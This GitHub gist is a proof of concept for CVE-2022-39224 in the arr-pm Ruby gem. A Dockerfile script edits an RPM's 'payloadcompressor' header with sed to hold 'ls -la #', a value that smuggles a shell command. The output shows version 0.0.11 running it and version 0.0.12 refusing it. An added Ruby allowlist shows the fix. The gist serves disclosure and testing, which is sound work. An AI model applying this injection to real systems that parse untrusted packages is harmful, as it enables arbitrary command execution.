@FrancoisCapon
Created June 24, 2025 11:11
CVE-2022-39224 POC (ARR-PM 0.0.11) in a Docker Container

CVE-2022-39224 POC in a Docker Container

I couldn't find an example PoC for this CVE in ruby-arr-pm 0.0.11, so I built one using a Docker container.

Usage

$ docker build -t cve-2022-39224:poc . && docker run -it cve-2022-39224:poc

RPM BUILD

* .spec
BuildArch: noarch
Summary: Regular RPM
Name: regular
Version: 1
Release: 0
License: MIT
%description
A regular RPM
%files
/script-01.sh
/script-02.sh
%install
cp /root/rpmbuild/SOURCES/* /root/rpmbuild/BUILD/regular-1-build/BUILDROOT/

* rpm
total 8
-rw-r--r-- 1 root root 6751 Jun 24 10:47 regular-1-0.noarch.rpm

* files
/script-01.sh
/script-02.sh

* payloadcompressor
zstd

POC

* change "payload compressor" field by any OS command, example: ls -la
581522be9cb2eca076b5266ab355e794  regular.rpm
6f6dceedd471c3c61a8e6b1edf405c5a  poc.rpm

poc.rpm is now a broken rpm but arr-pm don't care!
error: poc.rpm: region trailer: BAD, tag 1714501120 type 63 offset -7 count -816
error: poc.rpm: not an rpm package (or package manifest)

ARR-PM 0.0.11

* install
Fetching arr-pm-0.0.11.gem
Fetching cabin-0.9.0.gem
Successfully installed cabin-0.9.0
Successfully installed arr-pm-0.0.11
2 gems installed

* regular.rpm files
/script-01.sh
/script-02.sh

* poc.rpm files
total 32
drwxr-xr-x 1 root root 4096 Jun 24 10:47 .
dr-xr-x--- 1 root root 4096 Jun 24 10:47 ..
-rw-r--r-- 1 root root  176 Jun 24 10:21 poc.rb
-rw-r--r-- 1 root root 6755 Jun 24 10:47 poc.rpm
-rw-r--r-- 1 root root 6751 Jun 24 10:47 regular.rpm

ARR-PM 0.0.12

* install
Fetching arr-pm-0.0.12.gem
Successfully installed arr-pm-0.0.12
1 gem installed

* regular.rpm files
/script-01.sh
/script-02.sh

* poc.rpm files
/script-01.sh
/script-02.sh
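
The check that 0.0.11 lacked, shown as an added Ruby example (not code from the gist or from arr-pm itself): the payloadcompressor header value is matched against an allowlist and the decompressor is spawned in argv form, so a value like the gist's `ls -la #` is rejected instead of reaching a shell. The decompressor names and flags are assumptions about the usual CLI tools, and the gzip blob is a constructed stand-in for a real payload.

```ruby
require 'open3'
require 'zlib'   # only used to build the constructed sample payload below

# Compressor names an RPM header may legitimately carry, mapped to the argv
# (array form, never a shell string) that decompresses a payload to stdout.
# Assumption: these are the conventional CLI tools and flags.
KNOWN_DECOMPRESSORS = {
  'gzip'  => %w[gzip -dc],
  'bzip2' => %w[bzip2 -dc],
  'xz'    => %w[xz -dc],
  'lzma'  => %w[xz --format=lzma -dc],
  'zstd'  => %w[zstd -dc],
}.freeze

class UntrustedCompressor < StandardError; end

# Exact-match allowlist: returns the argv for a header value, or raises.
# "ls -la #" (the gist's poc.rpm), "zstd; id" or "" never get past this point.
def decompressor_argv(field)
  name = field.to_s.strip
  argv = KNOWN_DECOMPRESSORS[name]
  raise UntrustedCompressor, "unexpected payloadcompressor: #{field.inspect}" unless argv
  argv
end

# Decompress payload bytes by spawning the tool with argv, so no shell ever
# parses the value, even after it has been validated.
def decompress_payload(field, payload)
  argv = decompressor_argv(field)
  out, status = Open3.capture2(*argv, stdin_data: payload, binmode: true)
  raise "#{argv.first} exited with #{status.exitstatus}" unless status.success?
  out
end

# Constructed sample: a gzip blob standing in for an RPM cpio payload.
SAMPLE_TEXT = "constructed cpio stand-in\n".freeze
SAMPLE_GZIP_PAYLOAD = Zlib.gzip(SAMPLE_TEXT)

# Round trip through the allowlisted path; returns the decompressed text.
def demo_round_trip
  decompress_payload('gzip', SAMPLE_GZIP_PAYLOAD)
end
```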

Dockerfile

# https://github.com/jordansissel/ruby-arr-pm/security/advisories/GHSA-88cv-mj24-8w3q
# docker build -t cve-2022-39224:poc . && docker run -it cve-2022-39224:poc

FROM rubydistros/fedora-latest:3.1
RUN yum -y install rpm-build

WORKDIR /root/rpmbuild/SOURCES
COPY <<'EOF' script-01.sh
#!/bin/sh
echo "I'm a script: $0"
EOF
RUN cp script-01.sh script-02.sh

WORKDIR /root/rpmbuild/SPECS
COPY <<EOF rpm.spec
BuildArch: noarch
Summary: Regular RPM
Name: regular
Version: 1
Release: 0
License: MIT
%description
A regular RPM
%files
/script-01.sh
/script-02.sh
%install
cp /root/rpmbuild/SOURCES/* /root/rpmbuild/BUILD/regular-1-build/BUILDROOT/
EOF

WORKDIR /root/poc
COPY <<EOF poc.rb
require 'arr-pm'
regular = RPM::File.new('regular.rpm')
puts "* regular.rpm files"
puts regular.files
poc = RPM::File.new('poc.rpm')
puts
puts "* poc.rpm files"
puts poc.files
EOF

WORKDIR /root/
COPY --chmod=700 <<'EOF' ./entry.sh

echo
echo "RPM BUILD"
echo
cd rpmbuild
echo "* .spec"
cat ./SPECS/rpm.spec
rpmbuild -bb ./SPECS/rpm.spec > /dev/null 2>&1
echo
echo "* rpm"
ls -l RPMS/noarch/
cd ..
cd poc
cp ../rpmbuild/RPMS/noarch/regular-1-0.noarch.rpm regular.rpm
echo
echo "* files"
rpm -ql regular.rpm
echo
echo "* payloadcompressor"
rpm -qp regular.rpm --qf "%{PAYLOADCOMPRESSOR}"
echo

echo
echo "POC"
echo
cp regular.rpm poc.rpm
CMD='ls -la'
echo '* change "payload compressor" field by any OS command, example: '$CMD
sed -i "s~zstd~$CMD #~" poc.rpm
md5sum regular.rpm poc.rpm
echo
echo "poc.rpm is now a broken rpm but arr-pm don't care!"
rpm -qp poc.rpm --qf "%{PAYLOADCOMPRESSOR}"

echo
echo "ARR-PM 0.0.11"
echo
echo "* install"
gem install arr-pm -v 0.0.11
echo
ruby poc.rb

echo
echo "ARR-PM 0.0.12"
echo
echo "* install"
gem install arr-pm -v 0.0.12
echo
ruby poc.rb

echo
/bin/bash
EOF

ENTRYPOINT ./entry.sh